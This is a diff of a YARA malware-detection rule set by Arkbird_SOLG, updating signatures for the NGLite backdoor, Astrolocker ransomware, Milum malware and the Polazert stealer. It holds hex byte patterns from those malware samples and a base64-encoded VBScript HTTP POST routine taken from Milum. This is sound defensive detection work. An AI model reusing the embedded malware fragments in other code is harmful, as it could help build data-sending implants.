+		$seq_Jan_2021_2 = { 4c 8d 05 20 47 00 00 41 8b ce 48 8d 15 1e 47 00 00 e8 [2] 00 00 ba 04 01 00 00 48 8d 4c 24 40 ff 15 ?? 43 00 00 85 c0 75 12 b8 5c 00 00 00 c7 44 24 40 43 00 3a 00 66 89 44 24 44 89 6c 24 38 4c 8d 8c 24 78 02 00 00 48 89 6c 24 30 48 8d 4c 24 40 48 89 6c 24 28 45 33 c0 33 d2 48 89 6c 24 20 66 89 6c 24 46 ff 15 6b 44 00 00 44 8b 84 24 78 02 00 00 48 8d 15 e4 45 00 00 85 c0 b9 bd 07 a2 41 44 0f 44 c1 41 8b c8 44 89 84 24 78 02 00 00 c1 c9 09 41 8b c0 89 4c 24 28 45 8b c8 c1 c8 06 48 8d 4c 24 40 41 c1 c9 03 89 44 24 20 ff 15 8b 44 00 00 4c 8d 44 24 40 33 d2 33 c9 ff 15 ?? 42 00 00 48 85 c0 74 1b ff 15 [2] 00 00 3d b7 00 00 00 74 0e bf 01 00 00 00 48 8d 15 fe 45 00 00 eb 09 8b fd 48 8d 15 a3 45 00 00 41 8b }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 25KB and 6 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 30KB and 1 of ( $seq* )
 }
-rule ARKBIRD_SOLG_MAL_Nglite_Nov_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_Astrolocker_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect NGLite backdoor (version A)"
+		description = "Detect the Astrolocker ransomware"
 		author = "Arkbird_SOLG"
-		id = "cf2845f3-1176-5197-9d05-f123b0f23c75"
-		date = "2021-11-09"
-		modified = "2021-11-09"
-		reference = "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-08/NGLite/MAL_NGLite_Nov_2021_1.yara#L1-L19"
+		id = "f2c2c96a-277e-575b-8d80-4729f4a1cfe4"
+		date = "2020-05-12"
+		modified = "2021-05-16"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-12/Astrolocker/RAN_Astrolocker_May_2021_1.yara#L1-L18"
 		license_url = "N/A"
-		logic_hash = "ebafc52da76b9a960ee3c2c99955fb5dcb4acff2b7a0d7fad714bfc17617331a"
-		score = 75
+		logic_hash = "7e50642f5f864b7cffeb5ccf4581ac7566da24fd5361a3303a860f036cd6d439"
+		score = 50
 		quality = 75
 		tags = "FILE"
-		hash1 = "7e4038e18b5104683d2a33650d8c02a6a89badf30ca9174576bf0aff08c03e72"
-		hash2 = "3da8d1bfb8192f43cf5d9247035aa4445381d2d26bed981662e3db34824c71fd"
-		tlp = "white"
+		hash1 = "7fe1686f4afb9907f880a5e77bf30bc00fae71980f57ca70b60b7b1716456a2f"
+		hash2 = "b26749b17ca691328ba67ee49d4d9997c101966c607ab578afad204459b7bf8f"
+		tlp = "White"
 		adversary = "-"
+		level = "Experimental"
 
 	strings:
-		$s1 = { 48 8b 05 48 e7 90 00 48 8d 0d 99 4b 99 00 48 89 04 24 48 89 4c 24 08 48 c7 44 24 10 08 02 00 00 e8 82 21 00 00 48 8b 44 24 18 48 85 c0 74 33 48 3d 08 02 00 00 77 2b 48 8d 1d 69 4b 99 00 c6 04 03 5c 48 ff c0 48 89 05 4b 3f 99 00 e9 d6 fe ff ff 31 c0 e8 8f fc 02 00 ba 09 02 00 00 e8 b5 fc 02 00 48 8d 05 fe d5 55 00 48 89 04 24 48 c7 44 24 08 24 00 00 00 e8 cc 44 00 00 31 c0 e8 65 fc 02 00 90 e8 af d2 02 }
-		$s2 = { 48 83 ec 70 48 89 6c 24 68 48 8d 6c 24 68 48 c7 44 24 30 00 00 00 00 48 c7 44 24 28 00 00 00 00 48 8b 05 bf dc 90 00 48 89 04 24 48 c7 44 24 08 ff ff ff ff 48 8d 44 24 30 48 89 44 24 10 48 8d 44 24 28 48 89 44 24 18 e8 39 17 00 00 48 83 7c 24 20 00 74 35 31 c0 31 c9 eb 24 48 89 ca 48 89 c1 bb 01 00 00 00 48 d3 e3 48 23 5c 24 30 48 8d 72 01 48 85 db 48 0f 45 d6 48 ff c0 48 89 d1 48 83 f8 40 7c d6 48 85 c9 75 3e 0f 57 c0 0f 11 44 24 38 0f 11 44 24 48 0f 11 44 24 58 48 8b 05 23 dc 90 00 48 89 04 24 48 8d 44 24 38 48 89 44 24 08 e8 10 16 00 00 8b 44 24 58 89 44 24 78 48 8b 6c 24 68 48 83 c4 70 c3 89 4c 24 78 48 8b 6c 24 68 48 }
-		$s3 = { 48 8b 05 60 cc 90 00 48 89 04 24 0f 57 c0 0f 11 44 24 08 0f 11 44 24 18 e8 02 07 00 00 48 8b 44 24 28 48 8b 4c 24 40 48 89 81 10 03 00 00 48 85 c0 0f 84 80 00 00 00 48 8b 05 29 cc 90 00 48 89 04 24 0f 57 c0 0f 11 44 24 08 0f 11 44 24 18 e8 cb 06 00 00 48 8b 44 24 28 48 8b 4c 24 40 48 89 81 18 03 00 00 48 85 c0 74 0a 48 8b 6c 24 30 48 83 c4 38 c3 48 8d 05 ac e0 56 00 48 89 04 24 e8 1b b6 02 00 48 8b 05 e4 cb 90 00 48 8b 4c 24 40 48 8b 91 10 03 00 00 48 89 04 24 48 89 54 24 08 e8 5a 05 00 00 48 8b 44 24 40 48 c7 80 10 03 00 00 00 00 00 00 eb b3 48 8d 05 61 e0 56 00 48 89 04 24 e8 d8 b5 02 00 e9 6b ff ff ff 48 8b 6c 24 30 48 83 c4 38 }
-		$s4 = { 48 81 ec a0 00 00 00 48 89 ac 24 98 00 00 00 48 8d ac 24 98 00 00 00 48 c7 44 24 48 00 00 00 00 48 8b 05 8a c9 90 00 48 89 04 24 48 c7 44 24 08 ff ff ff ff 48 c7 44 24 10 fe ff ff ff 48 c7 44 24 18 ff ff ff ff 48 8d 44 24 48 48 89 44 24 20 0f 57 c0 0f 11 44 24 28 48 c7 44 24 38 02 00 00 00 e8 3b 05 00 00 65 48 8b 04 25 28 00 00 00 48 8b 80 00 00 00 00 48 8b 40 30 48 8b 4c 24 48 48 87 88 78 02 00 00 0f 57 c0 0f 11 44 24 68 0f 11 44 24 78 0f 11 84 24 88 00 00 00 48 8b 05 5f c8 90 00 48 89 04 24 48 8d 44 24 68 48 89 44 24 08 48 8d 44 24 68 48 89 44 24 10 48 c7 44 24 18 30 00 00 00 e8 59 03 00 00 48 83 7c 24 20 }
-		$s5 = { 48 8b 15 26 29 92 00 48 89 14 24 48 89 4c 24 08 48 89 44 24 10 48 c7 44 24 18 00 10 00 00 48 c7 44 24 20 04 00 00 00 e8 71 64 01 00 48 83 7c 24 28 00 40 0f 94 c6 48 8b 44 24 38 48 8b 4c 24 48 48 8b 54 24 68 48 8b 5c 24 40 e9 61 ff ff ff 48 8b 6c 24 50 48 83 c4 58 c3 48 8b 6c 24 50 48 83 c4 58 c3 e8 25 91 01 00 48 8d 05 e2 b8 56 00 48 89 04 24 48 c7 44 24 08 19 00 00 00 e8 bc 9a 01 00 48 8b 44 24 38 48 89 04 24 e8 be 97 01 00 48 8d 05 9a b1 56 00 48 89 04 24 48 c7 44 24 08 19 00 00 00 e8 95 9a 01 00 8b 44 24 34 48 89 04 24 e8 98 97 01 00 e8 73 93 01 00 e8 5e 91 01 00 48 8d }
+		$seq_Mar_2021_1 = { 6a 00 6a 00 ff 15 88 60 41 00 81 3d cc e6 b8 02 57 0f 00 00 8b 0d b4 c4 41 00 8b 15 b8 c4 41 00 a1 bc c4 41 00 89 4c 24 2c 89 54 24 20 89 44 24 24 75 14 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 28 60 41 00 8b 2d a8 60 41 00 c7 44 24 1c 20 00 00 00 8d 9b 00 00 00 00 8b 54 24 18 8b ce c1 e1 04 03 4c 24 20 8b c6 c1 e8 05 89 4c 24 14 8d 0c 32 89 44 24 10 8b 44 24 24 01 44 24 10 31 4c 24 14 81 3d cc e6 b8 02 f5 03 00 00 c7 05 0c da b8 02 36 06 ea e9 75 08 6a 00 ff 15 5c 60 41 00 8b 4c 24 14 31 4c 24 10 83 3d cc e6 b8 02 42 75 30 6a 00 6a 00 6a 00 ff d5 6a 30 8d 54 24 3c 6a 00 52 c7 44 24 40 00 00 00 00 e8 5a 5e ff ff 83 c4 0c 6a 00 8d 44 24 38 50 6a 00 ff 15 00 60 41 00 2b 5c 24 10 8b cb c1 e1 04 81 3d cc e6 b8 02 8c 07 00 00 89 4c 24 14 75 09 6a 00 6a 00 e8 d2 eb fe ff }
+		$seq_Apr_2021_1 = { 89 44 24 38 48 8b 05 78 4e 00 00 48 89 05 b9 9e 00 00 48 8b 05 52 4e 00 00 48 89 05 b3 9e 00 00 48 8b 05 4c 4e 00 00 48 89 05 ad 9e 00 00 48 8b 05 46 4e 00 00 48 89 05 a7 9e 00 00 8b 05 51 9e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 40KB and 4 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 30KB and 1 of ( $seq* )
 }
 rule ARKBIRD_SOLG_MAL_Nglite_Nov_2021_2 : FILE
 {
@@ -148683,277 +149499,230 @@ rule ARKBIRD_SOLG_MAL_Nglite_Nov_2021_2 : FILE
 		author = "Arkbird_SOLG"
 		id = "e18f2891-366b-5cff-a17e-63523bfd9cee"
 		date = "2021-11-08"
-		modified = "2021-11-09"
-		reference = "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-08/NGLite/MAL_NGLite_Nov_2021_2.yara#L1-L19"
-		license_url = "N/A"
-		logic_hash = "4d44d208010ca17f47f597f7d9eb5ee39d91a2d9077218a173ef0015699dc296"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		hash1 = "3f868ac52916ebb6f6186ac20b20903f63bc8e9c460e2418f2b032a207d8f21d"
-		hash2 = "805b92787ca7833eef5e61e2df1310e4b6544955e812e60b5f834f904623fd9f"
-		tlp = "white"
-		adversary = "-"
-
-	strings:
-		$s1 = { 8b 05 64 ?? bf 00 8d 0d e0 ?? c6 00 89 04 24 89 4c 24 04 c7 44 24 08 08 02 00 00 e8 d0 1d 00 00 8b 44 24 0c 85 c0 74 2e 3d 08 02 00 00 77 27 8d 1d e0 ?? c6 00 c6 04 03 5c 40 89 05 24 ?? c6 00 e9 0b ff ff ff 31 c0 e8 44 9f 02 00 ba 09 02 00 00 e8 6a 9f 02 00 8d 05 ?? 7b 8a 00 89 04 24 c7 44 24 04 24 00 00 00 e8 a4 3b 00 00 31 c0 e8 1d 9f 02 00 90 e8 57 86 02 }
-		$s2 = { 83 ec 40 c7 44 24 18 00 00 00 00 c7 44 24 14 00 00 00 00 8b 05 70 ?? bf 00 89 04 24 c7 44 24 04 ff ff ff ff 8d 44 24 18 89 44 24 08 8d 44 24 14 89 44 24 0c e8 21 15 00 00 8b 44 24 10 85 c0 74 32 31 c0 31 c9 eb 03 40 89 d1 83 f8 20 7d 20 19 d2 89 cb 89 c1 bd 01 00 00 00 d3 e5 21 d5 23 6c 24 18 85 ed 74 05 8d 53 01 eb dc 89 da eb d8 85 c9 75 2d 8d 7c 24 1c 31 c0 e8 63 98 02 00 8b 0d 60 ?? bf 00 89 0c 24 8d 4c 24 1c 89 4c 24 04 e8 46 14 00 00 8b 4c 24 30 89 4c 24 44 83 c4 40 c3 89 4c 24 44 83 c4 40 c3 e8 4d 7d 02 00 e9 38 }
-		$s3 = { 0f b6 2c 13 95 80 f8 80 95 72 f0 c7 44 24 20 00 00 00 00 8b 0d 7c ?? bf 00 89 0c 24 89 44 24 04 8d 4c 24 20 89 4c 24 08 e8 77 0b 00 00 8b 44 24 0c 85 c0 75 4a c7 44 24 1c 00 00 00 00 8b 05 20 ?? bf 00 89 04 24 8b 44 24 24 89 44 24 04 8b 44 24 30 89 44 24 08 8b 44 24 34 89 44 24 0c 8d 44 24 1c 89 44 24 10 c7 44 24 14 00 00 00 00 e8 f1 0b 00 00 8b 44 24 1c 89 44 24 38 83 c4 28 c3 8b 44 24 24 89 04 24 8b 44 24 30 89 44 24 04 8b 44 24 34 89 44 24 08 e8 59 00 00 00 8b 44 24 }
-		$s4 = { 83 ec 50 c7 44 24 24 00 00 00 00 8b 05 88 ?? bf 00 89 04 24 c7 44 24 04 ff ff ff ff c7 44 24 08 fe ff ff ff c7 44 24 0c ff ff ff ff 8d 44 24 24 89 44 24 10 c7 44 24 14 00 00 00 00 c7 44 24 18 00 00 00 00 c7 44 24 1c 02 00 00 00 e8 09 04 00 00 64 8b 05 14 00 00 00 8b 80 00 00 00 00 8b 40 18 84 00 05 68 01 00 00 89 04 24 8b 44 24 24 89 44 24 04 e8 d2 86 fd ff 8d 7c 24 34 31 c0 e8 60 86 02 00 8b 05 30 ?? bf 00 89 04 24 8d 44 24 34 89 44 24 04 8d 44 24 34 89 44 24 08 c7 44 24 0c 1c 00 00 00 e8 b1 02 00 00 8b 44 24 }
-		$s5 = { 8b 05 94 ?? bf 00 89 04 24 c7 44 24 04 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 10 00 00 00 00 e8 ed 05 00 00 8b 44 24 14 8b 4c 24 1c 89 81 b4 01 00 00 85 c0 74 7e 8b 05 94 ?? bf 00 89 04 24 c7 44 24 04 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 10 00 00 00 00 e8 ad 05 00 00 8b 44 24 14 8b 4c 24 1c 89 81 b8 01 00 00 85 c0 74 04 83 c4 18 c3 8d 05 ?? ?? 8b 00 89 04 24 e8 c9 6c 02 00 8b 05 98 ?? bf 00 8b 4c 24 1c 8b 91 b4 01 00 00 89 04 24 89 54 24 04 e8 ad 04 00 00 8b 44 24 1c c7 80 b4 01 }
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 40KB and 4 of ( $s* )
-}
-rule ARKBIRD_SOLG_MAL_Milum_Jul_2021_1 : FILE
-{
-	meta:
-		description = "Detect Milum malware"
-		author = "Arkbird_SOLG"
-		id = "ba1cc56e-f6da-57db-a773-4823ae343e31"
-		date = "2021-07-08"
-		modified = "2021-07-08"
-		reference = "https://securelist.com/wildpressure-targets-macos/103072/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-08/WildPressure/MAL_Milum_Jul_2021_1.yara#L1-L33"
-		license_url = "N/A"
-		logic_hash = "4321051fdc9ab5f4ee12c4b505e4271df89b489067875eaf3d2cb670815f7e37"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		hash1 = "7eafb957c2e715e06489a979a185f75d7a9d502223c8aba36e7b6b8ead7d03b2"
-		hash2 = "86456ebf6b807e8253faf1262e7a2b673131c80174f6133b253b2e5f0da442a9"
-		hash3 = "5e0226f37b861876ec38e4a1564a26e4af3022d869375bc0f09b8feea4cd9e1b"
-		tlp = "White"
-		adversary = "WildPressure"
-
-	strings:
-		$s1 = { 52 00 4f 00 4f 00 54 00 5c 00 53 00 65 00 63 00 75 00 72 00 69 00 74 00 79 00 43 00 65 00 6e 00 74 00 65 00 72 00 32 00 00 00 00 00 53 00 65 00 6c 00 65 00 63 00 74 00 20 [3-7] 20 00 46 00 72 00 6f 00 6d 00 20 00 41 00 6e 00 74 00 69 00 56 00 69 00 72 00 75 00 73 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 20 00 57 00 48 00 45 00 52 00 45 00 20 00 64 00 69 00 73 00 70 00 6c 00 61 00 79 00 4e 00 61 00 6d 00 65 00 20 00 3c 00 3e 00 27 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 44 00 65 00 66 00 65 00 6e 00 64 00 65 00 72 00 27 }
-		$s2 = "c1VybCA9IHt1fQ0Kc1JlcXVlc3QgPSB7cH0NCkhUVFBQb3N0IHNVcmwsIHNSZXF1ZXN0DQpGdW5jdGlvbiBIVFRQUG9zdChzVXJsLCBzUmVxdWVzdCkNCiAgc2V0IG9IVFRQID0gQ3JlYXRlT2JqZWN0KCJNaWNyb3NvZnQuWE1MSFRUUCIpDQogIG9IVFRQLm9wZW4gIlBPU1QiLCBzVXJsLGZhbHNlDQogIG9IVFRQLnNldFJlcXVlc3RIZWFkZXIgIkNvbnRlbnQtVHlwZSIsICJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiDQogIG9IVFRQLnNldFJlcXVlc3RIZWFkZXIgIkNvbnRlbnQtTGVuZ3RoIiwgTGVuKHNSZXF1ZXN0KQ0KICBvSFRUUC5zZW5kIHNSZXF1ZXN0DQogIFdzY3JpcHQuRWNobyBvSFRUUC5yZXNwb25zZVRleHQNCiAgSFRUUFBvc3QgPSBvSFRUUC5yZXNwb25zZVRleHQNCiBFbmQgRnVuY3Rpb24=" fullword ascii
-		$s3 = { 46 49 4c 45 20 48 41 4e 44 45 4c 20 4e 4f 54 20 46 4f 55 4e 44 00 00 00 4e 4f 20 44 61 74 61 00 }
-		$s4 = { 28 00 77 00 73 00 33 00 32 00 29 00 65 00 79 00 4a 00 73 00 62 00 32 00 35 00 6e 00 64 00 32 00 46 00 70 00 64 00 43 00 49 00 36 00 49 00 6a 00 }
-		$s5 = { 55 8b ec 6a ff 68 [3] 00 64 a1 00 00 00 00 50 83 ec 24 a1 [3] 00 33 c5 89 45 f0 ?? 57 50 8d 45 f4 64 a3 00 00 00 00 [8] b9 0f 00 00 00 89 4e }
-		$s6 = { 20 2f 63 20 [0-1] 46 4f 52 20 2f 6c 20 25 69 20 69 6e 20 28 31 2c 31 2c [1-4] 29 20 44 4f 20 49 46 20 4e 4f 54 20 45 58 49 53 54 20 22 00 22 29 }
-		$s7 = { 83 c4 0c 8d 95 44 fe ff ff 52 c7 85 44 fe ff ff 14 01 00 00 ff 15 [3] 00 83 bd 48 fe ff ff 06 7d 17 bf [3] 00 89 bd ?? fe ff ff c7 85 ?? fe ff ff [3] 00 eb 1a c7 85 ?? fe ff ff [3] 00 8b bd ?? fe ff ff c7 85 ?? fe ff ff [3] 00 }
-		$s8 = { 8b 45 08 50 68 bc 78 45 00 68 d0 78 45 00 8d 8d d0 fc ff ff 51 ff d6 83 c4 10 8b 3d a0 e0 44 00 8b 35 c4 e0 44 00 8d 64 }
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 40KB and 5 of ( $s* )
-}
-rule ARKBIRD_SOLG_MAL_Polazert_Apr_2021_1 : FILE
-{
-	meta:
-		description = "Detect Polazert stealer"
-		author = "Arkbird_SOLG"
-		id = "c7766749-558f-50b8-9054-01f5c4e1238b"
-		date = "2021-04-11"
-		modified = "2021-04-11"
-		reference = "https://bazaar.abuse.ch/browse/tag/Polazert/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-11/Polazert/MAL_Polazert_Apr_2021_1.yar#L1-L21"
+		modified = "2021-11-09"
+		reference = "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-08/NGLite/MAL_NGLite_Nov_2021_2.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "29cefeb3816435e70c706ac78395738f075f6c9f81d63e7295b0d8a6f370b51d"
+		logic_hash = "4d44d208010ca17f47f597f7d9eb5ee39d91a2d9077218a173ef0015699dc296"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		hash1 = "3f868ac52916ebb6f6186ac20b20903f63bc8e9c460e2418f2b032a207d8f21d"
+		hash2 = "805b92787ca7833eef5e61e2df1310e4b6544955e812e60b5f834f904623fd9f"
+		tlp = "white"
+		adversary = "-"
 
 	strings:
-		$seq1 = { 73 ?? 00 00 0a 13 ?? 11 ?? 72 [2] 00 70 6f ?? 00 00 0a 00 11 ?? 72 [2] 00 70 11 ?? 72 [2] 00 70 28 ?? 00 00 0a 6f ?? 00 00 0a 00 11 ?? 17 6f ?? 00 00 0a 00 11 ?? 28 ?? 00 00 0a 26 }
-		$seq2 = { 1b 8d 0e 00 00 01 13 ?? 11 ?? 16 72 a1 03 00 70 a2 11 ?? 17 08 a2 11 ?? 18 72 53 03 00 70 a2 11 ?? 19 11 ?? a2 11 ?? 1a 72 e7 03 00 70 a2 11 ?? 28 47 00 00 0a 13 0a }
-		$seq3 = { 02 73 ?? 00 00 0a 28 ?? 00 00 0a 74 2a 00 00 01 [2-4] 72 65 01 00 70 6f ?? 00 00 0a 00 [1-2] 72 65 01 00 70 6f ?? 00 00 0a 00 [1-2] 72 87 01 00 70 6f ?? 00 00 0a 00 03 [1-2] 73 ?? 00 00 0a 13 }
-		$seq4 = { 1f 0f 8d ?? 00 00 01 13 ?? 11 ?? 16 72 ?? ?? 00 70 a2 11 ?? 17 [1-2] a2 11 ?? 18 72 [2] 00 70 a2 11 ?? 19 28 ?? 00 00 06 a2 11 ?? 1a 72 ?? ?? 00 70 a2 11 ?? 1b 28 ?? 00 00 06 a2 11 ?? 1c 72 ?? ?? 00 70 a2 11 ?? 1d 28 ?? 00 00 06 2d 07 72 ?? ?? 00 70 2b 05 72 ?? ?? 00 70 a2 11 ?? 1e 72 ?? ?? 00 70 a2 11 ?? 1f 09 28 ?? 00 00 06 2d 07 72 ?? ?? 00 70 2b 05 72 ?? ?? 00 70 a2 11 ?? 1f 0a 72 [2] 00 70 a2 11 ?? 1f 0b [1-2] 7b 01 00 00 04 a2 11 ?? 1f 0c 72 [2] 00 70 a2 11 ?? 1f 0d 28 ?? 00 00 06 a2 11 ?? 1f 0e 72 [2] 00 70 a2 11 ?? 28 ?? 00 00 0a 13 }
-		$seq5 = { 1f ?? 8d ?? 00 00 01 13 ?? 11 ?? 16 72 91 01 00 70 a2 11 ?? 17 1a 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 68 9d 11 ?? 17 1f 77 9d 11 ?? 18 1f 69 9d 11 ?? 19 1f 64 9d 11 ?? 28 ?? 00 00 06 a2 11 ?? 18 72 b7 01 00 70 a2 11 ?? 19 ?? [0-1] a2 11 ?? 1a 72 bf 01 00 70 a2 11 ?? 1b 28 ?? 00 00 06 a2 11 ?? 1c 72 db 01 00 70 a2 11 ?? 1d 28 ?? 00 00 06 a2 11 ?? 1e 72 f7 01 00 70 a2 11 ?? 1f 09 28 ?? 00 00 06 2d 07 72 0d 02 00 70 2b 05 72 15 02 00 70 a2 11 ?? 1f 0a 72 1d 02 00 70 a2 11 ?? 1f 0b 28 ?? 00 00 06 2d 07 72 37 02 00 70 2b 05 72 41 02 00 70 a2 11 ?? 1f 0c 72 4d 02 00 70 a2 11 ?? 1f 0d ?? 7b ?? 00 00 04 a2 11 ?? 1f 0e 72 69 02 00 70 a2 11 ?? 1f 0f 1f 09 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 77 9d 11 ?? 17 1f 6f 9d 11 ?? 18 1f 72 9d 11 ?? 19 1f 6b 9d 11 ?? 1a 1f 67 9d 11 ?? 1b 1f 72 9d 11 ?? 1c 1f 6f 9d 11 ?? 1d 1f 75 9d 11 ?? 1e 1f 70 9d 11 ?? 28 ?? 00 00 06 a2 11 ?? 1f 10 72 b7 01 00 70 a2 11 ?? 1f 11 28 ?? 00 00 06 a2 11 ?? 1f 12 72 71 02 00 70 a2 11 ?? 1f 13 1f 14 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 77 9d 11 ?? 17 1f 69 9d 11 ?? 18 1f 6e 9d 11 ?? 19 1f 33 9d 11 ?? 1a 1f 32 9d 11 ?? 1b 1f 5f 9d 11 ?? 1c 1f 63 9d 11 ?? 1d 1f 6f 9d 11 ?? 1e 1f 6d 9d 11 ?? 1f 09 1f 70 9d 11 ?? 1f 0a 1f 75 9d 11 ?? 1f 0b 1f 74 9d 11 ?? 1f 0c 1f 65 9d 11 ?? 1f 0d 1f 72 9d 11 ?? 1f 0e 1f 73 9d 11 ?? 1f 0f 1f 79 9d 11 ?? 1f 10 1f 73 9d 11 ?? 1f 11 1f 74 9d 11 ?? 1f 12 1f 65 9d 11 ?? 1f 13 1f 6d 9d 11 ?? 28 ?? 00 00 06 1c 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 64 9d 11 ?? 17 1f 6f 9d 11 ?? 18 1f 6d 9d 11 ?? 19 1f 61 9d 11 ?? 1a 1f 69 9d 11 ?? 1b 1f 6e 9d 11 ?? 28 ?? 00 00 06 28 ?? 00 00 06 a2 11 ?? 1f 14 72 69 02 00 70 a2 11 ?? 1f 15 19 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 64 9d 11 ?? 17 1f 6e 9d 11 ?? 18 1f 73 9d 11 ?? 28 ?? 00 00 06 a2 11 ?? 1f 16 72 79 02 00 70 a2 11 ?? 1f 17 1f 14 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 77 9d 11 ?? 17 1f 69 9d 11 ?? 18 1f 6e 9d 11 ?? 19 1f 33 9d 11 ?? 1a 1f 32 9d 11 ?? 1b 1f 5f 9d 11 ?? 1c 1f 63 9d 11 ?? 1d 1f 6f 9d 11 ?? 1e 1f 6d 9d 11 ?? 1f 09 1f 70 9d 11 ?? 1f 0a 1f 75 9d 11 ?? 1f 0b 1f 74 9d 11 ?? 1f 0c 1f 65 9d 11 ?? 1f 0d 1f 72 9d 11 ?? 1f 0e 1f 73 9d 11 ?? 1f 0f 1f 79 9d 11 ?? 1f 10 1f 73 9d 11 ?? 1f 11 1f 74 9d 11 ?? 1f 12 1f 65 9d 11 ?? 1f 13 1f 6d 9d 11 ?? 28 ?? 00 00 06 1f 0c 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 70 9d 11 ?? 17 1f 61 9d 11 ?? 18 1f 72 9d 11 ?? 19 1f 74 9d 11 ?? 1a 1f 6f 9d 11 ?? 1b 1f 66 9d 11 ?? 1c 1f 64 9d 11 ?? 1d 1f 6f 9d 11 ?? 1e 1f 6d 9d 11 ?? 1f 09 1f 61 9d 11 ?? 1f 0a 1f 69 9d 11 ?? 1f 0b 1f 6e 9d 11 ?? 28 ?? 00 00 06 28 ?? 00 00 06 6f ?? 00 00 0a 72 7f 02 00 70 28 ?? 00 00 0a 2d 07 72 8b 02 00 70 2b 05 72 8f 02 00 70 a2 11 ?? 1f 18 }
-		$seq6 = { 13 30 02 00 2d 00 00 00 ?? 00 00 11 00 72 ?? ?? 00 70 28 ?? 00 00 0a 28 ?? 00 00 0a 73 ?? 00 00 0a 0a 06 72 ?? ?? 00 70 6f ?? 00 00 0a 0b 07 6f ?? 00 00 0a }
-		$seq7 = { 8d ?? 00 00 01 13 ?? 11 ?? 16 72 [2] 00 70 a2 11 ?? 17 [1-2] a2 11 ?? 18 72 [2] 00 70 a2 11 ?? 19 [2] a2 11 ?? 1a 72 [2] 00 70 a2 11 }
-		$seq8 = { 12 ?? 28 ?? 00 00 06 0f 00 28 ?? 00 00 06 d0 ?? 00 00 1b 28 ?? 00 00 0a 28 ?? 00 00 0a a5 ?? 00 00 1b [1-2] 2b 00 [1-2] 2a }
-		$seq9 = { 1f 10 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 47 9d 11 ?? 17 1f 65 9d 11 ?? 18 1f 74 9d 11 ?? 19 1f 54 9d 11 ?? 1a 1f 68 9d 11 ?? 1b 1f 72 9d 11 ?? 1c 1f 65 9d 11 ?? 1d 1f 61 9d 11 ?? 1e 1f 64 9d 11 ?? 1f 09 1f 43 9d 11 ?? 1f 0a 1f 6f 9d 11 ?? 1f 0b 1f 6e 9d 11 ?? 1f 0c 1f 74 9d 11 ?? 1f 0d 1f 65 9d 11 ?? 1f 0e 1f 78 9d 11 ?? 1f 0f 1f 74 9d 11 ?? 28 97 00 00 06 28 09 00 00 2b 13 }
+		$s1 = { 8b 05 64 ?? bf 00 8d 0d e0 ?? c6 00 89 04 24 89 4c 24 04 c7 44 24 08 08 02 00 00 e8 d0 1d 00 00 8b 44 24 0c 85 c0 74 2e 3d 08 02 00 00 77 27 8d 1d e0 ?? c6 00 c6 04 03 5c 40 89 05 24 ?? c6 00 e9 0b ff ff ff 31 c0 e8 44 9f 02 00 ba 09 02 00 00 e8 6a 9f 02 00 8d 05 ?? 7b 8a 00 89 04 24 c7 44 24 04 24 00 00 00 e8 a4 3b 00 00 31 c0 e8 1d 9f 02 00 90 e8 57 86 02 }
+		$s2 = { 83 ec 40 c7 44 24 18 00 00 00 00 c7 44 24 14 00 00 00 00 8b 05 70 ?? bf 00 89 04 24 c7 44 24 04 ff ff ff ff 8d 44 24 18 89 44 24 08 8d 44 24 14 89 44 24 0c e8 21 15 00 00 8b 44 24 10 85 c0 74 32 31 c0 31 c9 eb 03 40 89 d1 83 f8 20 7d 20 19 d2 89 cb 89 c1 bd 01 00 00 00 d3 e5 21 d5 23 6c 24 18 85 ed 74 05 8d 53 01 eb dc 89 da eb d8 85 c9 75 2d 8d 7c 24 1c 31 c0 e8 63 98 02 00 8b 0d 60 ?? bf 00 89 0c 24 8d 4c 24 1c 89 4c 24 04 e8 46 14 00 00 8b 4c 24 30 89 4c 24 44 83 c4 40 c3 89 4c 24 44 83 c4 40 c3 e8 4d 7d 02 00 e9 38 }
